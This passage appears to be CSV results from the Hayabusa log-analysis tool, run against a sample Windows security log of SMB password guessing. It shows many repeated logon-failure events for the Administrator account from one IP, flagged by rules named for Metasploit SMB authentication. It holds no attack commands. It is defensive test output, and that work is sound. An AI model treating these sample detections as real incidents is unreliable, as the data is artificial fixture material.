NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
